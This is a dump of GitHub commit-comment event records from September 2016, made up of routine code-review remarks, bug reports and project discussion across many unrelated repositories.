{"id":"4543523411","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"clubcapra/Ibex"},"payload":{"comment":{"id":18972659,"position":79,"line":79,"path":"src/capra_filters/README.html","commit_id":"42cc2ff6a61f274d8c435f0af5347a7a21746d2e","created_at":"2016-09-10T05:51:05Z","updated_at":"2016-09-10T05:51:05Z","body":"ox-html triggered"}},"created_at":"2016-09-10T05:51:05Z"}
{"id":"4543526005","type":"CommitCommentEvent","actor":{"login":"Landrash"},"repo":{"name":"Landrash/pi-gen"},"payload":{"comment":{"id":18972667,"position":null,"line":null,"path":null,"commit_id":"275c29e66dedd74fe80debb8326362b4bac0fab5","created_at":"2016-09-10T05:53:38Z","updated_at":"2016-09-10T05:53:38Z","body":"I like it. \r\nI personally would prefer:\r\n-``email client` instead of `email reader`\r\n- Basically this stage is the stage that installs all the things that make Raspbian friendly to new users."}},"created_at":"2016-09-10T05:53:38Z"}
{"id":"4543528302","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18972675,"position":22,"line":49,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-10T05:56:00Z","updated_at":"2016-09-10T05:56:00Z","body":"Hi @koola,\r\n\r\nI had this like\r\n```\r\nthis.autoResize = options.autoResize || true;\r\n```\r\n\r\nbut when `autoResize : false` it always returned true. Got a better way to check this then I already have?"}},"created_at":"2016-09-10T05:56:00Z"}
{"id":"4543528417","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":18972676,"position":null,"line":null,"path":null,"commit_id":"e45b59f3136cf03282f723619f213fde92cba0fd","created_at":"2016-09-10T05:56:09Z","updated_at":"2016-09-10T05:56:09Z","body":"you should not have committed this directly to the metadata-v2 branch"}},"created_at":"2016-09-10T05:56:09Z"}
{"id":"4543528589","type":"CommitCommentEvent","actor":{"login":"xusiyuan841028"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18972677,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-10T05:56:18Z","updated_at":"2016-09-10T05:56:18Z","body":"@blueyed From this commit, the integration with YouCompleteMe is broken, and the complete menu doesn't contains any snips. Could you re-review the code of this PR to resolve the issue of working together with YCM?\r\n\r\ncommit: dfde9b0\r\n![image](https://cloud.githubusercontent.com/assets/1681459/18408282/0c3abb7c-775e-11e6-9c7a-787d7a308fdf.png)\r\n\r\ncommit: 8d77e89d\r\n![image](https://cloud.githubusercontent.com/assets/1681459/18408293/45ca4d62-775e-11e6-85bb-1e81db4d49c6.png)\r\n\r\n"}},"created_at":"2016-09-10T05:56:18Z"}
{"id":"4543528995","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18972678,"position":50,"line":75,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-10T05:56:43Z","updated_at":"2016-09-10T05:56:43Z","body":"Merged master"}},"created_at":"2016-09-10T05:56:43Z"}
{"id":"4543529743","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18972679,"position":53,"line":78,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-10T05:57:30Z","updated_at":"2016-09-10T05:57:30Z","body":"Changed it"}},"created_at":"2016-09-10T05:57:30Z"}
{"id":"4543530870","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18972682,"position":69,"line":125,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-10T05:58:32Z","updated_at":"2016-09-10T05:58:32Z","body":"Changed it"}},"created_at":"2016-09-10T05:58:32Z"}
{"id":"4543534946","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18972738,"position":null,"line":null,"path":null,"commit_id":"4d0453eb52be19db8f58dcd2e47a5d449b7d6232","created_at":"2016-09-10T06:01:33Z","updated_at":"2016-09-10T06:01:33Z","body":"Thanks"}},"created_at":"2016-09-10T06:01:33Z"}
{"id":"4543535593","type":"CommitCommentEvent","actor":{"login":"v3ss0n"},"repo":{"name":"Semantic-Org/Semantic-UI-Ember"},"payload":{"comment":{"id":18972745,"position":null,"line":null,"path":null,"commit_id":"21cca0eb6ff0390e5569b9ff6a3ae8ad20d63abb","created_at":"2016-09-10T06:02:08Z","updated_at":"2016-09-10T06:02:08Z","body":"awesome work man! gonna test it. Is that ready to test?"}},"created_at":"2016-09-10T06:02:08Z"}
{"id":"4543539478","type":"CommitCommentEvent","actor":{"login":"mcsauder"},"repo":{"name":"mcsauder/libserial"},"payload":{"comment":{"id":18972754,"position":null,"line":null,"path":null,"commit_id":"c0dda111a0844910726cf0ba08fd51a7bd30bfd3","created_at":"2016-09-10T06:05:39Z","updated_at":"2016-09-10T06:05:39Z","body":"Hi CrayzeeWulf,\n\nThat sounds great!\n\nThanks so much for looking everything over!\n\nRespectfully,\n\nMark Sauder, M.S. M.E.\nCEO, *Grey Point Corporation* <http://www.greypointcorp.com/>\nc: 801.698.8786\nmcsauder@greypointcorp.com\n\n\nOn Fri, Sep 9, 2016 at 10:46 PM, CrayzeeWulf <notifications@github.com>\nwrote:\n\n> Mark:\n>\n> I am accepting this pull request but would like to revert a few changes\n> afterwards if you agree with my comments below (all of which are minor\n> issues):\n>\n>    - You added (void) argc and (void) argv in read_port.cpp and\n>    write_port.cpp examples to quiet compiler warnings. However, I do not\n>    think this is needed in write_port.cpp as both argv and argc are used\n>    in that example and you should not get any compiler warnings about unused\n>    variables there. Please let me know if this is correct.\n>    - In read_port.cpp I would recommend simply removing the unused\n>    arguments from main(). In other words, simply replace int main(int\n>    argc, char** argv) with int main(). This is valid C++\n>    <http://en.cppreference.com/w/cpp/language/main_function>.\n>    -\n>\n>    I've tried to use the following naming convention for naming variables\n>    in the library:\n>    - Use camelCase with first letter in lower case for function and\n>       method parameters (except argc and argv as they are in widespread\n>       use). For example, baudRate in void SerialPort::SetBaudRate( const\n>       BaudRate baudRate ).\n>       - Use mCamelCase for class data members. For example,\n>       SerialPort::mSerialPortImpl.\n>       - Use underscore_separatation for all local variables. For example,\n>       see the local variable named signal_dispatcher in the definition of\n>       SerialPort::SerialPortImpl::Open() in SerialPort.cpp.\n>\n>    This helps easily differentiate between class data, function/method\n>    parameters and local variables. It also avoid conflicts between such\n>    variable names. Following this convention has helped me a lot in larger\n>    projects. Hence, in the examples read_port.cpp and write_port.cpp, the\n>    local variables ought to be named serial_stream and not serialStream.\n>    If you agree and see the same benefit I see in following this convention, I\n>    would recommend updating the examples and unit tests accordingly in the\n>    long run (i.e. eventually). But I would not lose sleep over this.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcsauder/libserial/commit/c0dda111a0844910726cf0ba08fd51a7bd30bfd3#commitcomment-18972492>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACYdn-HYlVx9dQUp48e7dvhSItoylZKJks5qojYQgaJpZM4J5omx>\n> .\n>\n"}},"created_at":"2016-09-10T06:05:39Z"}
{"id":"4543546025","type":"CommitCommentEvent","actor":{"login":"kimson0509"},"repo":{"name":"tonytrjdung/batdongsan"},"payload":{"comment":{"id":18972763,"position":null,"line":null,"path":null,"commit_id":"c7ff416a48ad69cbcdf119a3c4ea101fb8e3ac24","created_at":"2016-09-10T06:11:45Z","updated_at":"2016-09-10T06:11:45Z","body":"555"}},"created_at":"2016-09-10T06:11:45Z"}
{"id":"4543546581","type":"CommitCommentEvent","actor":{"login":"igorsantos07"},"repo":{"name":"tleunen/react-mdl"},"payload":{"comment":{"id":18972764,"position":4,"line":28,"path":"src/Tabs/Tabs.js","commit_id":"603434572ac6ac68730217415419d06a9d17dc6c","created_at":"2016-09-10T06:12:18Z","updated_at":"2016-09-10T06:12:18Z","body":"could this be the cause for #394? But if it is... shouldn't mdlUpgrade do the same job instead?"}},"created_at":"2016-09-10T06:12:18Z"}
{"id":"4543547147","type":"CommitCommentEvent","actor":{"login":"mrbarbasa"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18972767,"position":23,"line":140,"path":"js/cash_register.js","commit_id":"51873e54b208d4bfcd8da787aec18e6383858ca2","created_at":"2016-09-10T06:12:52Z","updated_at":"2016-09-10T06:12:52Z","body":"I would rename `upd` to something else since it's a global variable - had to think about what it stood for for a moment.  Maybe something like `updateDisplayInterval`."}},"created_at":"2016-09-10T06:12:52Z"}
{"id":"4543547981","type":"CommitCommentEvent","actor":{"login":"txwdyzcb"},"repo":{"name":"txwdyzcb/hello-world-xiaoyu"},"payload":{"comment":{"id":18972769,"position":null,"line":null,"path":null,"commit_id":"97dc48f1ec6b0c5add90db22aba7b3feae45694a","created_at":"2016-09-10T06:13:36Z","updated_at":"2016-09-10T06:13:36Z","body":"ok"}},"created_at":"2016-09-10T06:13:36Z"}
{"id":"4543548566","type":"CommitCommentEvent","actor":{"login":"mrbarbasa"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18972770,"position":13,"line":112,"path":"js/cash_register.js","commit_id":"51873e54b208d4bfcd8da787aec18e6383858ca2","created_at":"2016-09-10T06:14:05Z","updated_at":"2016-09-10T06:14:05Z","body":"Just wondering, why the need for both a `setTimeout` and `setInterval`?"}},"created_at":"2016-09-10T06:14:05Z"}
{"id":"4543549093","type":"CommitCommentEvent","actor":{"login":"scidom"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":18972771,"position":null,"line":null,"path":null,"commit_id":"e45b59f3136cf03282f723619f213fde92cba0fd","created_at":"2016-09-10T06:14:35Z","updated_at":"2016-09-10T06:14:35Z","body":"Thanks @tkelman, I follow the convention of opening PRs when I upgrade a package. This specific commit was somewhat different, as it required changing the url in metadata, so I had to touch this file. Then, since this is a single-token and very simple change was needed, I thought it would be an overkill to pass this through you - as a long standing member in the community, I have write access and did this naive change to be a bit more efficient (as other long standing members ocassionally manage metadata too - not all commits come through you as I can see in the history?). I remember with Ian there was no issue with such simple changes, however if you are asking me to report to you for every trivial change, I will conform and will do so in the future. Cheers."}},"created_at":"2016-09-10T06:14:35Z"}
{"id":"4543554920","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"behdad/playground"},"payload":{"comment":{"id":18972777,"position":null,"line":null,"path":null,"commit_id":"520fefd69ace8973e2617de5315539697fe7b2e1","created_at":"2016-09-10T06:19:55Z","updated_at":"2016-09-10T06:19:55Z","body":"cc @brawer."}},"created_at":"2016-09-10T06:19:55Z"}
{"id":"4543555218","type":"CommitCommentEvent","actor":{"login":"travisgoodspeed"},"repo":{"name":"travisgoodspeed/MD380Tool"},"payload":{"comment":{"id":18972778,"position":null,"line":null,"path":null,"commit_id":"0bbd11d90f12ff2acc8076a6a58a72851598a8eb","created_at":"2016-09-10T06:20:11Z","updated_at":"2016-09-10T06:20:11Z","body":"I've tossed the Android SDK on my travel laptop, but I don't have much time to play with this lately. \r\n\r\nCheers from Novi Sad,\r\nYU/KK4VCZ\r\n"}},"created_at":"2016-09-10T06:20:11Z"}
{"id":"4543555793","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"behdad/playground"},"payload":{"comment":{"id":18972779,"position":null,"line":null,"path":null,"commit_id":"520fefd69ace8973e2617de5315539697fe7b2e1","created_at":"2016-09-10T06:20:39Z","updated_at":"2016-09-10T06:20:39Z","body":"Right now this is a hack to work around lack of 'fvar' support in HarfBuzz.  'avar' support is also missing.  I wish I could get the normalized coordinates out of FreeType, but doesn't seem to be possible right now."}},"created_at":"2016-09-10T06:20:39Z"}
{"id":"4543556996","type":"CommitCommentEvent","actor":{"login":"UsulPro"},"repo":{"name":"BosNaufal/react-scrollbar"},"payload":{"comment":{"id":18972781,"position":null,"line":null,"path":null,"commit_id":"c57a8f84092c2a2a2c3463e822009f82a5436af5","created_at":"2016-09-10T06:21:45Z","updated_at":"2016-09-10T06:21:45Z","body":"Great! Just what we need!"}},"created_at":"2016-09-10T06:21:45Z"}
{"id":"4543557418","type":"CommitCommentEvent","actor":{"login":"csmith105"},"repo":{"name":"variscarey/M4650-Repo"},"payload":{"comment":{"id":18972782,"position":null,"line":null,"path":null,"commit_id":"3da24c77bb67e9ec4d010a9b006c57b709817fde","created_at":"2016-09-10T06:22:11Z","updated_at":"2016-09-10T06:22:11Z","body":"@variscarey I believe there is yet another issue with deriv, please see the attached file.\r\n\r\n![issue](https://cloud.githubusercontent.com/assets/9948631/18408422/912236e8-76ec-11e6-823b-b68dad05bd0b.PNG)\r\n"}},"created_at":"2016-09-10T06:22:11Z"}
{"id":"4543557456","type":"CommitCommentEvent","actor":{"login":"schmico"},"repo":{"name":"schmico/teamedup"},"payload":{"comment":{"id":18972783,"position":null,"line":null,"path":null,"commit_id":"498f3eabead3a50b732edb03d3b3d9159861cea4","created_at":"2016-09-10T06:22:13Z","updated_at":"2016-09-10T06:22:13Z","body":"I have removed the reference to homepage-desktop.jpg in cover.css as it was breaking the build (collectstatic failing due to the image not being available)"}},"created_at":"2016-09-10T06:22:13Z"}
{"id":"4543559201","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18972787,"position":null,"line":null,"path":null,"commit_id":"f512805b8a93b385e87238aa6f9f00a3ef7457bd","created_at":"2016-09-10T06:23:51Z","updated_at":"2016-09-10T06:23:51Z","body":"@Iamblichos and @ilteroi,\r\n\r\nAnother night of debugging. Fixed some more issues with naval ops (are working much, much better now) and took care of a few outstanding bugs and request. Also worked on the new espionage heists system, is working as intended now.\r\n\r\nStill need to test RNG some more, and I'm sure some elements of naval ops could be improved/optimized further. But we shall see! Going to post this for notque to run through his AI gauntlet as well."}},"created_at":"2016-09-10T06:23:51Z"}
{"id":"4543561706","type":"CommitCommentEvent","actor":{"login":"lukicweb"},"repo":{"name":"travisgoodspeed/MD380Tool"},"payload":{"comment":{"id":18972791,"position":null,"line":null,"path":null,"commit_id":"0bbd11d90f12ff2acc8076a6a58a72851598a8eb","created_at":"2016-09-10T06:26:04Z","updated_at":"2016-09-10T06:26:04Z","body":"Hope girls from Novi Sad not gona stop you :) my favorit city in Serbia.. Dont drink to much rakija..."}},"created_at":"2016-09-10T06:26:04Z"}
{"id":"4543563232","type":"CommitCommentEvent","actor":{"login":"zetachang"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18972793,"position":4,"line":253,"path":"docs/NativeModulesIOS.md","commit_id":"66abc86c9aa8bfa0bff979dd82719afe3f6a7567","created_at":"2016-09-10T06:27:27Z","updated_at":"2016-09-10T06:27:27Z","body":"Found a typo here 🔎 "}},"created_at":"2016-09-10T06:27:27Z"}
{"id":"4543563581","type":"CommitCommentEvent","actor":{"login":"mrbarbasa"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18972794,"position":null,"line":null,"path":null,"commit_id":"51873e54b208d4bfcd8da787aec18e6383858ca2","created_at":"2016-09-10T06:27:48Z","updated_at":"2016-09-10T06:27:48Z","body":"@SpaceToastCoastToCoast Hey Alan, your code looks great!  I really like how there's a function for everything, that the functions do one thing, and that there's hardly any repetition.  You're even trying out ES6 early on, so kudos for that!"}},"created_at":"2016-09-10T06:27:48Z"}
{"id":"4543564333","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18972799,"position":null,"line":null,"path":null,"commit_id":"89a5e35255063d87d3eb389d00f25a44a82d24fa","created_at":"2016-09-10T06:28:29Z","updated_at":"2016-09-10T06:28:29Z","body":"Thx @samuraitruong \r\nAwesome!\r\n![screenshot_191](https://cloud.githubusercontent.com/assets/4365551/18408447/5563cb3a-775a-11e6-9aec-6e2cb20fbe86.jpg)\r\n"}},"created_at":"2016-09-10T06:28:29Z"}
{"id":"4543564391","type":"CommitCommentEvent","actor":{"login":"bertramn"},"repo":{"name":"SmartBear/soapui"},"payload":{"comment":{"id":18972801,"position":5,"line":93,"path":"soapui/src/main/java/com/eviware/soapui/plugins/PluginManager.java","commit_id":"cbe496da4ae56aa1f08c4b643124589dec9eed80","created_at":"2016-09-10T06:28:31Z","updated_at":"2016-09-10T06:28:31Z","body":"Sad to see vested business interests getting in the way of a good open source project ... time for a fork anyone?"}},"created_at":"2016-09-10T06:28:31Z"}
{"id":"4543564431","type":"CommitCommentEvent","actor":{"login":"kaleemullah360"},"repo":{"name":"kaleemullah360/kontiki"},"payload":{"comment":{"id":18972802,"position":12,"line":84,"path":"apps/config-radio/README.md","commit_id":"f04647eeb35c4b5e00bd567d7cb7b0bac7a2747b","created_at":"2016-09-10T06:28:34Z","updated_at":"2016-09-10T06:28:34Z","body":"CRLF => LF => CRLF"}},"created_at":"2016-09-10T06:28:34Z"}
{"id":"4543564584","type":"CommitCommentEvent","actor":{"login":"elvis17"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":18972804,"position":null,"line":null,"path":null,"commit_id":"fb4700618462c5d265461985a92449e6dd95aceb","created_at":"2016-09-10T06:28:41Z","updated_at":"2016-09-10T06:28:41Z","body":"Where my money"}},"created_at":"2016-09-10T06:28:41Z"}
{"id":"4543569780","type":"CommitCommentEvent","actor":{"login":"resmo"},"repo":{"name":"ansible/ansible-modules-extras"},"payload":{"comment":{"id":18972814,"position":130,"line":130,"path":"notification/bandwidth.py","commit_id":"8794606fea31b27f6b18378f68d2f9f6bbd431c0","created_at":"2016-09-10T06:33:01Z","updated_at":"2016-09-10T06:33:01Z","body":"please add `no_log=True` for secrets"}},"created_at":"2016-09-10T06:33:01Z"}
{"id":"4543571273","type":"CommitCommentEvent","actor":{"login":"Enjirro"},"repo":{"name":"Enjirro/C-_code"},"payload":{"comment":{"id":18972818,"position":8,"line":33,"path":"Drunk_Ani.txt","commit_id":"bd212b7276679df8fd4bbb0f36b0f64ff80be77c","created_at":"2016-09-10T06:34:19Z","updated_at":"2016-09-10T06:34:19Z","body":"Some comment"}},"created_at":"2016-09-10T06:34:19Z"}
{"id":"4543574465","type":"CommitCommentEvent","actor":{"login":"thewhowhatwhere"},"repo":{"name":"phobosgroup/dtc2"},"payload":{"comment":{"id":18972822,"position":null,"line":null,"path":null,"commit_id":"8cf650c17d7f0af0b70e9e6ee134d2de7a29fc42","created_at":"2016-09-10T06:37:08Z","updated_at":"2016-09-10T06:37:08Z","body":"The curl call got removed. Not sure if intentional. "}},"created_at":"2016-09-10T06:37:08Z"}
{"id":"4543577209","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18972823,"position":null,"line":null,"path":null,"commit_id":"ce38a20beac15dd001d28d4f00609beda91e7d4c","created_at":"2016-09-10T06:39:42Z","updated_at":"2016-09-10T06:39:42Z","body":"develop (Unknown) - i386-Windows-7-VisualStudio-12: Tests Failed (2163 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ce38a20beac15dd001d28d4f00609beda91e7d4c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.36%25-red.svg)</a> \n"}},"created_at":"2016-09-10T06:39:42Z"}
{"id":"4543580936","type":"CommitCommentEvent","actor":{"login":"vli02"},"repo":{"name":"vli02/inthsmp"},"payload":{"comment":{"id":18972826,"position":null,"line":null,"path":null,"commit_id":"d9b42cc41c93808eafc604a5ac929b0c43ad0e11","created_at":"2016-09-10T06:43:15Z","updated_at":"2016-09-10T06:43:15Z","body":"Everything in one zip."}},"created_at":"2016-09-10T06:43:15Z"}
{"id":"4543582384","type":"CommitCommentEvent","actor":{"login":"julmot"},"repo":{"name":"lukasoppermann/mark"},"payload":{"comment":{"id":18972828,"position":null,"line":null,"path":null,"commit_id":"a6dfc458d35a9e758b741449ec25782479addb36","created_at":"2016-09-10T06:44:29Z","updated_at":"2016-09-10T06:44:29Z","body":"@lukasoppermann While this name is allowed and was available on npm because I didn't want to use, it may confuse your and my users because of the name conflict."}},"created_at":"2016-09-10T06:44:29Z"}
{"id":"4543583661","type":"CommitCommentEvent","actor":{"login":"alexgit2k"},"repo":{"name":"sitaramc/gitolite"},"payload":{"comment":{"id":18972829,"position":null,"line":null,"path":null,"commit_id":"eb3f12f4d024937084ef52aecff82c390a4fa9c1","created_at":"2016-09-10T06:45:42Z","updated_at":"2016-09-10T06:45:42Z","body":"In which case does `find .  -name \"*.git\" -prune` ever return an entry with a trailing slash?\r\n\r\nAnd shouldn't only bare repositories allowed in ~/repositories? I do have only bare repositories.\r\nTo list only bare-repositories (name.git) and exclude non-bare-repositories (.git): `find . -name \"*.git\" \\! -name \".git\" -prune`\r\n"}},"created_at":"2016-09-10T06:45:42Z"}
{"id":"4543588262","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":18972834,"position":null,"line":null,"path":null,"commit_id":"922ef42e2b647315b63d8d967086063e595a32cd","created_at":"2016-09-10T06:50:07Z","updated_at":"2016-09-10T06:50:07Z","body":"Solves #7 and starts #16 "}},"created_at":"2016-09-10T06:50:07Z"}
{"id":"4543594733","type":"CommitCommentEvent","actor":{"login":"gogogofuture"},"repo":{"name":"gogogofuture/karma-jasmine-seajs"},"payload":{"comment":{"id":18972844,"position":null,"line":null,"path":null,"commit_id":"bd6ad6a29ab6b3cfdf03681cd52ad98a995a4794","created_at":"2016-09-10T06:56:32Z","updated_at":"2016-09-10T06:56:32Z","body":"karma+seajs+jasmine"}},"created_at":"2016-09-10T06:56:32Z"}
{"id":"4543596367","type":"CommitCommentEvent","actor":{"login":"grappler"},"repo":{"name":"valeriu/twentyseventeen"},"payload":{"comment":{"id":18972846,"position":8,"line":54,"path":"inc/template-tags.php","commit_id":"43a38b7196ad8c9c388d85bd876d9741d3a2458e","created_at":"2016-09-10T06:58:16Z","updated_at":"2016-09-10T06:58:16Z","body":"You should use tabs not spaces. `// WPCS: XSS OK.` needs to come on the same line as `$categories` and `$posted_on`"}},"created_at":"2016-09-10T06:58:16Z"}
{"id":"4543597406","type":"CommitCommentEvent","actor":{"login":"jancsessz"},"repo":{"name":"AOSP-RRO/platform_build"},"payload":{"comment":{"id":18972849,"position":null,"line":null,"path":null,"commit_id":"3418fe3a12ac0fc6800aaeca70f3e06d5d4dc4de","created_at":"2016-09-10T06:59:23Z","updated_at":"2016-09-10T06:59:23Z","body":"I get error with openjdk 1.8: required version 1.7x and with openjdk 1.7.x get error in the end. Oracle 1.7.x doest work :(."}},"created_at":"2016-09-10T06:59:23Z"}
{"id":"4543601909","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":18972868,"position":null,"line":null,"path":null,"commit_id":"e45b59f3136cf03282f723619f213fde92cba0fd","created_at":"2016-09-10T07:02:37Z","updated_at":"2016-09-10T07:02:37Z","body":"It doesn't absolutely need to be merged by me, but see the readme of metadata - everyone should go through a PR, since the validation checks of metadata are stricter than they used to be, and if anything were to cause them to fail then every other PR would fail as well."}},"created_at":"2016-09-10T07:02:37Z"}
{"id":"4543613245","type":"CommitCommentEvent","actor":{"login":"hudson6666"},"repo":{"name":"hudson6666/Cellular-Automaton-in-Cpp"},"payload":{"comment":{"id":18972896,"position":75,"line":75,"path":"CellCar.cpp","commit_id":"3e3c2ecc8308967e5bdfdcabfb0ec401e5fbc9c1","created_at":"2016-09-10T07:12:12Z","updated_at":"2016-09-10T07:12:12Z","body":"new"}},"created_at":"2016-09-10T07:12:12Z"}
{"id":"4543615523","type":"CommitCommentEvent","actor":{"login":"hudson6666"},"repo":{"name":"hudson6666/Cellular-Automaton-in-Cpp"},"payload":{"comment":{"id":18972900,"position":69,"line":69,"path":"CellCar.cpp","commit_id":"3e3c2ecc8308967e5bdfdcabfb0ec401e5fbc9c1","created_at":"2016-09-10T07:14:17Z","updated_at":"2016-09-10T07:14:17Z","body":">="}},"created_at":"2016-09-10T07:14:17Z"}
{"id":"4543616966","type":"CommitCommentEvent","actor":{"login":"dvv"},"repo":{"name":"ESP8266nu/ESPEasy"},"payload":{"comment":{"id":18972902,"position":53,"line":53,"path":"_P007_PCF8591.ino","commit_id":"fd5120aaf24ef8062c36ef378da653ae797cbd3f","created_at":"2016-09-10T07:15:33Z","updated_at":"2016-09-10T07:15:33Z","body":"Wiki states ports are numbered 0..3. This line means they should be 1..4, no?"}},"created_at":"2016-09-10T07:15:33Z"}
{"id":"4543618660","type":"CommitCommentEvent","actor":{"login":"xixisplit"},"repo":{"name":"xixisplit/textField"},"payload":{"comment":{"id":18972904,"position":2,"line":2,"path":"README.md","commit_id":"088ccab450aeeef70ec0e9c549195f9187833e32","created_at":"2016-09-10T07:17:04Z","updated_at":"2016-09-10T07:17:04Z","body":"![image](image/QQ20160910-1.png)"}},"created_at":"2016-09-10T07:17:04Z"}
{"id":"4543620384","type":"CommitCommentEvent","actor":{"login":"xixisplit"},"repo":{"name":"xixisplit/textField"},"payload":{"comment":{"id":18972905,"position":3,"line":3,"path":"README.md","commit_id":"088ccab450aeeef70ec0e9c549195f9187833e32","created_at":"2016-09-10T07:18:42Z","updated_at":"2016-09-10T07:18:42Z","body":"从上到下依次为.银行卡. 金额. 密码.手机号-带数字键盘"}},"created_at":"2016-09-10T07:18:42Z"}
{"id":"4543622604","type":"CommitCommentEvent","actor":{"login":"DiscoTim"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18972907,"position":null,"line":null,"path":null,"commit_id":"098f356fa055650fb96ae8d71b7c9dfd3df161ba","created_at":"2016-09-10T07:20:38Z","updated_at":"2016-09-10T07:20:38Z","body":"this is awesome.\r\nwas there a reason why i8ln wasn't moved to common?"}},"created_at":"2016-09-10T07:20:38Z"}
{"id":"4543622986","type":"CommitCommentEvent","actor":{"login":"dvv"},"repo":{"name":"ESP8266nu/ESPEasy"},"payload":{"comment":{"id":18972908,"position":75,"line":75,"path":"_P016_IR.ino","commit_id":"7e781bda3f5fb726b920952126d703cda5fb915c","created_at":"2016-09-10T07:21:00Z","updated_at":"2016-09-10T07:21:00Z","body":"Please consider guarding against stray garbage, e.g.\r\n```\r\nif (results.decode_type > 0) { sendData(event); }\r\n```\r\n"}},"created_at":"2016-09-10T07:21:00Z"}
{"id":"4543624615","type":"CommitCommentEvent","actor":{"login":"tavy315"},"repo":{"name":"dirmax/ZFDebug"},"payload":{"comment":{"id":18972909,"position":null,"line":null,"path":null,"commit_id":"151d4112e60cf6850ce4968b4e8c70dd642ac387","created_at":"2016-09-10T07:22:26Z","updated_at":"2016-09-10T07:22:26Z","body":"        $contentType = $this->getRequest()->getHeader('Content-Type');\r\n        if (false !== $contentType && false === strpos($contentType, 'html') && false === strpos($contentType, 'application/x-www-form-urlencoded')) {\r\n            return;\r\n        }"}},"created_at":"2016-09-10T07:22:26Z"}
{"id":"4543625428","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18972911,"position":null,"line":null,"path":null,"commit_id":"090176fb96a3bf43b0c6963ccd1ebf6353d8ab79","created_at":"2016-09-10T07:23:12Z","updated_at":"2016-09-10T07:23:12Z","body":"Should I already see any icon in the try? Actually there is nothing there."}},"created_at":"2016-09-10T07:23:12Z"}
{"id":"4543625794","type":"CommitCommentEvent","actor":{"login":"kasidesh"},"repo":{"name":"kasidesh/typescript-for-people"},"payload":{"comment":{"id":18972912,"position":null,"line":null,"path":null,"commit_id":"bce4129eedc44d540f92fe8d8979412cebc80a1c","created_at":"2016-09-10T07:23:30Z","updated_at":"2016-09-10T07:23:30Z","body":"it's interface instead of inheritance\r\n"}},"created_at":"2016-09-10T07:23:30Z"}
{"id":"4543626962","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":18972913,"position":null,"line":null,"path":null,"commit_id":"c0df7ea82ea66c23433bf8ca04ceeba7781c5d03","created_at":"2016-09-10T07:24:23Z","updated_at":"2016-09-10T07:24:23Z","body":"How do you guys benchmark these? \r\nAlso check sched_deadline from Mainstream & CAF. "}},"created_at":"2016-09-10T07:24:23Z"}
{"id":"4543627211","type":"CommitCommentEvent","actor":{"login":"perfk"},"repo":{"name":"dklollol/Olsen-Framework-Arma-3"},"payload":{"comment":{"id":18972914,"position":null,"line":null,"path":null,"commit_id":"5758f5f91be01503bed2fc1399b2fe9274de8290","created_at":"2016-09-10T07:24:36Z","updated_at":"2016-09-10T07:24:36Z","body":"What was the error?\r\n\r\nHow are you going to call FNC_EventDisconnect now?"}},"created_at":"2016-09-10T07:24:36Z"}
